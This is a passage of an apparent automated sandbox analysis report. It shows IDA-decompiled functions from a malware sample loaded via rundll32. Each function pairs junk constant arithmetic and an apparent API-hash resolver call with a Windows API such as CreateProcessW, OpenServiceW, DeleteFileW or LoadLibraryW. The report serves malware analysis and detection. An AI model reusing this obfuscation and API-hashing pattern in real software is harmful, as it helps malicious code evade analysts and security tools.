                                                                                                                      • CreateProcessW.KERNEL32(?,00D9A4AC,00000000,00000000,?,00000000,00000000,00000000,?,0009AF77), ref: 0074685C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.510033009.0000000000730000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.510057605.0000000000755000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_730000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 963392458-0
                                                                                                                      • Opcode ID: 1da9d84ba9731b44f90d75a5bdd1d83cf5135f1bd2c9de3e9664fac0f2fd65d2
                                                                                                                      • Instruction ID: 4c32dca6c78fcdaf6119b708e9e0c1235b6fcf2d99bd19457976d37bf8dc99cf
                                                                                                                      • Opcode Fuzzy Hash: 1da9d84ba9731b44f90d75a5bdd1d83cf5135f1bd2c9de3e9664fac0f2fd65d2
                                                                                                                      • Instruction Fuzzy Hash: C721E77290024CBBDF119F95CD09CDFBFB9EF99714F008148FA1466121D7B68A64EBA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 48%
                                                                                                                      			E0074E938(long __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32, long _a36, WCHAR* _a40) {
                                                                                                                      				signed int _v8;
                                                                                                                      				unsigned int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				void* _t34;
                                                                                                                      				void* _t41;
                                                                                                                      				long _t45;
                                                                                                                      				long _t46;
                                                                                                                      
                                                                                                                      				_push(_a40);
                                                                                                                      				_t45 = __edx;
                                                                                                                      				_push(_a36);
                                                                                                                      				_t46 = __ecx;
                                                                                                                      				_push(_a32);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a24);
                                                                                                                      				_push(_a20);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0073CF25(_t34);
                                                                                                                      				_v16 = 0x974c12;
                                                                                                                      				_v16 = _v16 * 0x75;
                                                                                                                      				_v16 = _v16 ^ 0x4529a886;
                                                                                                                      				_v12 = 0x89ee90;
                                                                                                                      				_v12 = _v12 >> 3;
                                                                                                                      				_v12 = _v12 >> 0xd;
                                                                                                                      				_v12 = _v12 ^ 0x0001fd6b;
                                                                                                                      				_v8 = 0x2afb1;
                                                                                                                      				_v8 = _v8 + 0xffff660b;
                                                                                                                      				_v8 = _v8 | 0x1aac0731;
                                                                                                                      				_v8 = _v8 ^ 0x1aae47e7;
                                                                                                                      				E00732D9F(0xb361a139, 0x20d, __ecx, 0xa62ab78c);
                                                                                                                      				_t41 = CreateFileW(_a40, _t45, _a36, 0, _a12, _t46, 0); // executed
                                                                                                                      				return _t41;
                                                                                                                      			}











                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNEL32(?,?,?,00000000,?,?,00000000), ref: 0074E9E0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.510033009.0000000000730000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.510057605.0000000000755000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_730000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 823142352-0
                                                                                                                      • Opcode ID: 360c415e9015d3d13679f61f4bfb391b888432a2a898910ac906551ddd5173d2
                                                                                                                      • Instruction ID: a7b73bd6017137ea7914bb878ac60be7eb758502ff174a6bf4a629821dd64edf
                                                                                                                      • Opcode Fuzzy Hash: 360c415e9015d3d13679f61f4bfb391b888432a2a898910ac906551ddd5173d2
                                                                                                                      • Instruction Fuzzy Hash: 4C11147690120CBFDF059ED5DC8ACDEBFB9EB48354F148198F924A6211D2768A24DF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 71%
                                                                                                                      			E00737A47(long __ecx, void* __edx, intOrPtr _a4, void* _a8, long _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				void* _t37;
                                                                                                                      				void* _t45;
                                                                                                                      				long _t48;
                                                                                                                      
                                                                                                                      				_push(_a20);
                                                                                                                      				_t48 = __ecx;
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0073CF25(_t37);
                                                                                                                      				_v20 = _v20 & 0x00000000;
                                                                                                                      				_v24 = 0xfcacd9;
                                                                                                                      				_v8 = 0xc1635f;
                                                                                                                      				_v8 = _v8 >> 7;
                                                                                                                      				_v8 = _v8 * 0x50;
                                                                                                                      				_v8 = _v8 * 0x36;
                                                                                                                      				_v8 = _v8 ^ 0x197e1637;
                                                                                                                      				_v16 = 0x23fde3;
                                                                                                                      				_v16 = _v16 << 0xf;
                                                                                                                      				_v16 = _v16 + 0x8916;
                                                                                                                      				_v16 = _v16 ^ 0xfef173e1;
                                                                                                                      				_v12 = 0xdffc87;
                                                                                                                      				_v12 = _v12 | 0x0f84fa40;
                                                                                                                      				_v12 = _v12 ^ 0x35513bb9;
                                                                                                                      				_v12 = _v12 ^ 0x3a8da81e;
                                                                                                                      				E00732D9F(0x9afcb52f, 0x1c3, __ecx, 0xa62ab78c);
                                                                                                                      				_t45 = RtlAllocateHeap(_a8, _t48, _a12); // executed
                                                                                                                      				return _t45;
                                                                                                                      			}












                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(FEF173E1,00989527,00000000,?,?,?,?,?,?,?,?,?,?,003C356D), ref: 00737AF1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.510033009.0000000000730000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.510057605.0000000000755000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_730000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0
                                                                                                                      • Opcode ID: 0f32b3375919fc0ccfdf2406b6b0c1b31f8184e837ed22a30a99afc3922f126c
                                                                                                                      • Instruction ID: 4b4f06309974cb2ce7a86f9189899a174e8e902f2dee0ec4516971096a761ec6
                                                                                                                      • Opcode Fuzzy Hash: 0f32b3375919fc0ccfdf2406b6b0c1b31f8184e837ed22a30a99afc3922f126c
                                                                                                                      • Instruction Fuzzy Hash: 8E11E2B2C0120DFBDF05DF94DA4A8EEBBB4EB14304F14C099E9116A252D7715B24AF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 67%
                                                                                                                      			E00732E96(void* __ecx, void* __edx, intOrPtr _a4, int _a8, intOrPtr _a12, short* _a16, void* _a20) {
                                                                                                                      				signed int _v8;
                                                                                                                      				unsigned int _v12;
                                                                                                                      				unsigned int _v16;
                                                                                                                      				void* _t35;
                                                                                                                      				void* _t42;
                                                                                                                      
                                                                                                                      				_push(_a20);
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0073CF25(_t35);
                                                                                                                      				_v16 = 0xae7ad3;
                                                                                                                      				_v16 = _v16 >> 6;
                                                                                                                      				_v16 = _v16 >> 9;
                                                                                                                      				_v16 = _v16 ^ 0x000b5401;
                                                                                                                      				_v12 = 0xf75da6;
                                                                                                                      				_v12 = _v12 >> 7;
                                                                                                                      				_v12 = _v12 + 0xa35c;
                                                                                                                      				_v12 = _v12 ^ 0x00021a7e;
                                                                                                                      				_v8 = 0xb7fdd7;
                                                                                                                      				_v8 = _v8 * 0x34;
                                                                                                                      				_v8 = _v8 >> 7;
                                                                                                                      				_v8 = _v8 | 0x8cd68937;
                                                                                                                      				_v8 = _v8 ^ 0x8cd3b3e5;
                                                                                                                      				E00732D9F(0x53eee54a, 0xc3, __ecx, 0x1b74c9e2);
                                                                                                                      				_t42 = OpenServiceW(_a20, _a16, _a8); // executed
                                                                                                                      				return _t42;
                                                                                                                      			}









                                                                                                                      APIs
                                                                                                                      • OpenServiceW.ADVAPI32(?,?,000B5401), ref: 00732F2E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.510033009.0000000000730000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.510057605.0000000000755000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_730000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: OpenService
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3098006287-0
                                                                                                                      • Opcode ID: 1a010bb4209eebcabefe83886664eafcedc3f71cda4b3a4488a61dc91c7b4f8b
                                                                                                                      • Instruction ID: 3a9d8a26dd6effd26c25f7331c554f2596361dd93956f22035b91cce03816042
                                                                                                                      • Opcode Fuzzy Hash: 1a010bb4209eebcabefe83886664eafcedc3f71cda4b3a4488a61dc91c7b4f8b
                                                                                                                      • Instruction Fuzzy Hash: C311CE72D0120CFBCF05EFE4D94A89DBBB1EB14308F20C098F915A6261E3769B64AF41
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E0073BAB0(WCHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                      				unsigned int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				void* _t30;
                                                                                                                      				int _t37;
                                                                                                                      				WCHAR* _t40;
                                                                                                                      
                                                                                                                      				_push(_a4);
                                                                                                                      				_t40 = __ecx;
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0073CF25(_t30);
                                                                                                                      				_v12 = 0xf8a4b;
                                                                                                                      				_v12 = _v12 >> 2;
                                                                                                                      				_v12 = _v12 ^ 0xa9327f6f;
                                                                                                                      				_v12 = _v12 ^ 0x26166746;
                                                                                                                      				_v12 = _v12 ^ 0x8f266abd;
                                                                                                                      				_v16 = 0xc512b4;
                                                                                                                      				_v16 = _v16 ^ 0xa05564f8;
                                                                                                                      				_v16 = _v16 | 0x9f0a4514;
                                                                                                                      				_v16 = _v16 ^ 0xbf9c633f;
                                                                                                                      				_v8 = 0x850486;
                                                                                                                      				_v8 = _v8 * 0x26;
                                                                                                                      				_v8 = _v8 + 0xffff9e70;
                                                                                                                      				_v8 = _v8 >> 0xf;
                                                                                                                      				_v8 = _v8 ^ 0x00077990;
                                                                                                                      				E00732D9F(0x7bb5ca56, 0xa2, __ecx, 0xa62ab78c);
                                                                                                                      				_t37 = DeleteFileW(_t40); // executed
                                                                                                                      				return _t37;
                                                                                                                      			}










                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.510033009.0000000000730000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.510057605.0000000000755000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_730000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: DeleteFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4033686569-0
                                                                                                                      • Opcode ID: 142492e115de819e337085e0760341fc4d7c13ea390934f1e7f80fc7c158108e
                                                                                                                      • Instruction ID: 32c04e8ec8568446332a28cf9ad2db42e4a84b97c734671eec75860fd3eb18f1
                                                                                                                      • Opcode Fuzzy Hash: 142492e115de819e337085e0760341fc4d7c13ea390934f1e7f80fc7c158108e
                                                                                                                      • Instruction Fuzzy Hash: 1101F375D01209FBDB54EFA5C98A4DEBFB4EF00300F208188E825AA211D7B41B459F95
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 86%
                                                                                                                      			E007507D7(void* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				void* _t30;
                                                                                                                      				struct HINSTANCE__* _t39;
                                                                                                                      				signed int _t41;
                                                                                                                      
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				E0073CF25(_t30);
                                                                                                                      				_v12 = 0x89457d;
                                                                                                                      				_v12 = _v12 ^ 0x6b886c65;
                                                                                                                      				_v12 = _v12 | 0xf6315bef;
                                                                                                                      				_v12 = _v12 ^ 0xff319cd3;
                                                                                                                      				_v8 = 0xe31a0f;
                                                                                                                      				_t41 = 0xa;
                                                                                                                      				_v8 = _v8 * 0x1b;
                                                                                                                      				_v8 = _v8 << 5;
                                                                                                                      				_v8 = _v8 ^ 0xfe799add;
                                                                                                                      				_v16 = 0x93f3d7;
                                                                                                                      				_v16 = _v16 / _t41;
                                                                                                                      				_v16 = _v16 ^ 0x00076e75;
                                                                                                                      				E00732D9F(0xe1be5824, 0x1e6, _t41, 0xa62ab78c);
                                                                                                                      				_t39 = LoadLibraryW(_a4); // executed
                                                                                                                      				return _t39;
                                                                                                                      			}










                                                                                                                      APIs
                                                                                                                      • LoadLibraryW.KERNEL32(FF319CD3), ref: 00750861
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.510033009.0000000000730000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.510057605.0000000000755000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_730000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: LibraryLoad
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1029625771-0
                                                                                                                      • Opcode ID: b5a7ff1cf00df94c7e0cce40bb031e72467efb4d89ba6605bf6ea92949dc313d
                                                                                                                      • Instruction ID: 4dbb32a5e5abfa6048241efa9cdd55d356b747cbff32fb7ae036edaf8d32f2d7
                                                                                                                      • Opcode Fuzzy Hash: b5a7ff1cf00df94c7e0cce40bb031e72467efb4d89ba6605bf6ea92949dc313d
                                                                                                                      • Instruction Fuzzy Hash: 0F012275D0520CFFDB08EFE4C94A99EBFB1EB40304F20C098E915AB261E7B55B559B40
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 81%
                                                                                                                      			E0074E2C5(void* __ecx, void* __edx, intOrPtr _a4, struct _SHFILEOPSTRUCTW* _a8) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				unsigned int _v16;
                                                                                                                      				void* _t30;
                                                                                                                      				int _t37;
                                                                                                                      
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0073CF25(_t30);
                                                                                                                      				_v16 = 0x8c64b0;
                                                                                                                      				_v16 = _v16 + 0x962b;
                                                                                                                      				_v16 = _v16 >> 8;
                                                                                                                      				_v16 = _v16 ^ 0x000da62a;
                                                                                                                      				_v12 = 0xb02c29;
                                                                                                                      				_v12 = _v12 * 0x73;
                                                                                                                      				_v12 = _v12 + 0xffff997c;
                                                                                                                      				_v12 = _v12 ^ 0x4f272bd9;
                                                                                                                      				_v8 = 0x94952e;
                                                                                                                      				_v8 = _v8 + 0xa237;
                                                                                                                      				_v8 = _v8 ^ 0xcd764018;
                                                                                                                      				_v8 = _v8 + 0x8874;
                                                                                                                      				_v8 = _v8 ^ 0xcdeaa0fe;
                                                                                                                      				E00732D9F(0x2326b427, 0x2d, __ecx, 0xe4d0349b);
                                                                                                                      				_t37 = SHFileOperationW(_a8); // executed
                                                                                                                      				return _t37;
                                                                                                                      			}









                                                                                                                      APIs
                                                                                                                      • SHFileOperationW.SHELL32(000DA62A), ref: 0074E354
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.510033009.0000000000730000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.510057605.0000000000755000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_730000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FileOperation
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3080627654-0
                                                                                                                      • Opcode ID: df6e4e8d08ba67a79e6cc9105b91064a7161cfa041adeded471142a79e914314
                                                                                                                      • Instruction ID: 1dab9ef9940545002b200408029e0556932f629db03f19fc1a8639ff82be1bf8
                                                                                                                      • Opcode Fuzzy Hash: df6e4e8d08ba67a79e6cc9105b91064a7161cfa041adeded471142a79e914314
                                                                                                                      • Instruction Fuzzy Hash: AB0102B1D00308FBDB51DFA8D84A89DBBB0EB00314F20C188A8146A252E7B98B589F01
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00743CBB() {
                                                                                                                      				unsigned int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				signed int _t37;
                                                                                                                      
                                                                                                                      				_v20 = _v20 & 0x00000000;
                                                                                                                      				_v24 = 0x868838;
                                                                                                                      				_v16 = 0xb6c7ac;
                                                                                                                      				_t37 = 0x79;
                                                                                                                      				_v16 = _v16 * 0x7d;
                                                                                                                      				_v16 = _v16 ^ 0x593c5b8b;
                                                                                                                      				_v8 = 0x23929;
                                                                                                                      				_v8 = _v8 | 0xd856564b;
                                                                                                                      				_v8 = _v8 << 0xd;
                                                                                                                      				_v8 = _v8 >> 1;
                                                                                                                      				_v8 = _v8 ^ 0x67f2afdd;
                                                                                                                      				_v12 = 0x42ac5b;
                                                                                                                      				_v12 = _v12 / _t37;
                                                                                                                      				_v12 = _v12 ^ 0x0009f0c4;
                                                                                                                      				E00732D9F(0x8cff02b7, 0x12e, _t37, 0xa62ab78c);
                                                                                                                      				ExitProcess(0);
                                                                                                                      			}

                                                                                                                      APIs
                                                                                                                      • ExitProcess.KERNEL32(00000000), ref: 00743D3B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.510033009.0000000000730000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.510057605.0000000000755000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_730000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 621844428-0
                                                                                                                      • Opcode ID: dd524d5e584c69c4875a986859085bb36bd1bb49e57c992e29c8257b5ff704c2
                                                                                                                      • Instruction ID: b177262af6eae7d6f13451d27294d3e2ceeb6c6a48a0562be640ce07ef664204
                                                                                                                      • Opcode Fuzzy Hash: dd524d5e584c69c4875a986859085bb36bd1bb49e57c992e29c8257b5ff704c2
                                                                                                                      • Instruction Fuzzy Hash: C20144B6D0020CFFDB04DFE4C94AA9DBBB0EB00300F608089E925AB290D7B81B50DF41
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 80%
                                                                                                                      			E0074FC96(void* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, WCHAR* _a12) {
                                                                                                                      				signed int _v8;
                                                                                                                      				unsigned int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				void* _t32;
                                                                                                                      				int _t40;
                                                                                                                      				signed int _t42;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				E0073CF25(_t32);
                                                                                                                      				_v8 = 0x178fa1;
                                                                                                                      				_v8 = _v8 | 0x2f4d5c19;
                                                                                                                      				_v8 = _v8 + 0xda24;
                                                                                                                      				_t42 = 0x35;
                                                                                                                      				_v8 = _v8 / _t42;
                                                                                                                      				_v8 = _v8 ^ 0x00e923af;
                                                                                                                      				_v16 = 0xca5f26;
                                                                                                                      				_v16 = _v16 << 0xe;
                                                                                                                      				_v16 = _v16 ^ 0x97c71065;
                                                                                                                      				_v12 = 0xeb54f5;
                                                                                                                      				_v12 = _v12 >> 4;
                                                                                                                      				_v12 = _v12 ^ 0x0000b8cd;
                                                                                                                      				E00732D9F(0xb8f00729, 0x289, _t42, 0xa62ab78c);
                                                                                                                      				_t40 = lstrcmpiW(_a12, _a4); // executed
                                                                                                                      				return _t40;
                                                                                                                      			}

                                                                                                                      APIs
                                                                                                                      • lstrcmpiW.KERNEL32(?,0000B8CD), ref: 0074FD23
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.510033009.0000000000730000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.510057605.0000000000755000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_730000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1586166983-0
                                                                                                                      • Opcode ID: bcaea3a6b408ae5b0ea271ecf45cf18554c4d7f2312cff19f50c51f1dc53bf3d
                                                                                                                      • Instruction ID: 319607c0a758ea0da2930f7ee42a9c12e1fd8c6f88fd1319bfb9df0d0d52b06a
                                                                                                                      • Opcode Fuzzy Hash: bcaea3a6b408ae5b0ea271ecf45cf18554c4d7f2312cff19f50c51f1dc53bf3d
                                                                                                                      • Instruction Fuzzy Hash: 9D01C276D00208FFDF05EFE4C94A89EBBB5AB44304F108098E9156A251DBB69B649B51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E0082CCD7() {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				char _v1560;
                                                                                                                      				char _v1564;
                                                                                                                      				signed int _v1568;
                                                                                                                      				signed int _v1572;
                                                                                                                      				signed int _v1576;
                                                                                                                      				signed int _v1580;
                                                                                                                      				signed int _v1584;
                                                                                                                      				signed int _v1588;
                                                                                                                      				signed int _v1592;
                                                                                                                      				signed int _v1596;
                                                                                                                      				signed int _v1600;
                                                                                                                      				signed int _v1604;
                                                                                                                      				signed int _v1608;
                                                                                                                      				signed int _v1612;
                                                                                                                      				signed int _v1616;
                                                                                                                      				signed int _v1620;
                                                                                                                      				signed int _v1624;
                                                                                                                      				signed int _v1628;
                                                                                                                      				signed int _v1632;
                                                                                                                      				signed int _v1636;
                                                                                                                      				signed int _v1640;
                                                                                                                      				signed int _v1644;
                                                                                                                      				signed int _v1648;
                                                                                                                      				signed int _v1652;
                                                                                                                      				signed int _v1656;
                                                                                                                      				signed int _v1660;
                                                                                                                      				signed int _v1664;
                                                                                                                      				signed int _v1668;
                                                                                                                      				signed int _v1672;
                                                                                                                      				signed int _v1676;
                                                                                                                      				signed int _v1680;
                                                                                                                      				signed int _v1684;
                                                                                                                      				signed int _v1688;
                                                                                                                      				signed int _v1692;
                                                                                                                      				signed int _v1696;
                                                                                                                      				signed int _v1700;
                                                                                                                      				signed int _v1704;
                                                                                                                      				signed int _v1708;
                                                                                                                      				signed int _v1712;
                                                                                                                      				unsigned int _v1716;
                                                                                                                      				signed int _v1720;
                                                                                                                      				signed int _v1724;
                                                                                                                      				signed int _v1728;
                                                                                                                      				signed int _v1732;
                                                                                                                      				signed int _v1736;
                                                                                                                      				signed int _v1740;
                                                                                                                      				signed int _v1744;
                                                                                                                      				signed int _v1748;
                                                                                                                      				signed int _v1752;
                                                                                                                      				signed int _v1756;
                                                                                                                      				signed int _v1760;
                                                                                                                      				void* _t526;
                                                                                                                      				signed int _t531;
                                                                                                                      				void* _t540;
                                                                                                                      				signed int _t550;
                                                                                                                      				signed int _t552;
                                                                                                                      				signed int _t553;
                                                                                                                      				signed int _t554;
                                                                                                                      				signed int _t555;
                                                                                                                      				signed int _t556;
                                                                                                                      				signed int _t557;
                                                                                                                      				signed int _t558;
                                                                                                                      				signed int _t559;
                                                                                                                      				signed int _t560;
                                                                                                                      				signed int _t561;
                                                                                                                      				signed int _t562;
                                                                                                                      				signed int _t563;
                                                                                                                      				signed int _t564;
                                                                                                                      				signed int _t565;
                                                                                                                      				signed int _t566;
                                                                                                                      				signed int _t567;
                                                                                                                      				void* _t568;
                                                                                                                      				void* _t625;
                                                                                                                      				signed int _t627;
                                                                                                                      				signed int* _t631;
                                                                                                                      
                                                                                                                      				_t631 =  &_v1760;
                                                                                                                      				_v1616 = 0xeae527;
                                                                                                                      				_v1568 = 0;
                                                                                                                      				_t553 = 0x26;
                                                                                                                      				_v1616 = _v1616 / _t553;
                                                                                                                      				_v1616 = _v1616 ^ 0x00062e5a;
                                                                                                                      				_t625 = 0x971d92c;
                                                                                                                      				_v1596 = 0x6602e1;
                                                                                                                      				_t554 = 0x25;
                                                                                                                      				_v1596 = _v1596 / _t554;
                                                                                                                      				_v1596 = _v1596 ^ 0x8002c1cf;
                                                                                                                      				_v1644 = 0xf63434;
                                                                                                                      				_t555 = 0x47;
                                                                                                                      				_v1644 = _v1644 / _t555;
                                                                                                                      				_v1644 = _v1644 + 0xf19c;
                                                                                                                      				_v1644 = _v1644 ^ 0x00046956;
                                                                                                                      				_v1716 = 0x50524a;
                                                                                                                      				_t32 =  &_v1716; // 0x50524a
                                                                                                                      				_t556 = 0x5f;
                                                                                                                      				_v1716 =  *_t32 / _t556;
                                                                                                                      				_v1716 = _v1716 + 0xeb9a;
                                                                                                                      				_v1716 = _v1716 >> 0x10;
                                                                                                                      				_v1696 = 0xd12665;
                                                                                                                      				_v1696 = _v1696 + 0xba99;
                                                                                                                      				_v1696 = _v1696 >> 2;
                                                                                                                      				_v1696 = _v1696 ^ 0x003ae3d7;
                                                                                                                      				_v1572 = 0xb7077f;
                                                                                                                      				_v1572 = _v1572 >> 0xb;
                                                                                                                      				_v1572 = _v1572 ^ 0x00005559;
                                                                                                                      				_v1732 = 0xacadbb;
                                                                                                                      				_v1732 = _v1732 * 0x18;
                                                                                                                      				_v1732 = _v1732 + 0xffff3f00;
                                                                                                                      				_v1732 = _v1732 >> 0xb;
                                                                                                                      				_v1732 = _v1732 ^ 0x0000fc07;
                                                                                                                      				_v1628 = 0x1e838c;
                                                                                                                      				_v1628 = _v1628 + 0xffff51c5;
                                                                                                                      				_v1628 = _v1628 * 0x68;
                                                                                                                      				_v1628 = _v1628 ^ 0x0c18a6b3;
                                                                                                                      				_v1712 = 0x7a729f;
                                                                                                                      				_v1712 = _v1712 | 0x553aa77e;
                                                                                                                      				_v1712 = _v1712 ^ 0x421b02cb;
                                                                                                                      				_v1712 = _v1712 * 0x57;
                                                                                                                      				_v1712 = _v1712 ^ 0xf24da14c;
                                                                                                                      				_v1620 = 0x85e70f;
                                                                                                                      				_v1620 = _v1620 >> 0xb;
                                                                                                                      				_v1620 = _v1620 ^ 0x000e59ba;
                                                                                                                      				_v1752 = 0xad6578;
                                                                                                                      				_v1752 = _v1752 * 0x5a;
                                                                                                                      				_v1752 = _v1752 << 0xc;
                                                                                                                      				_v1752 = _v1752 << 0x10;
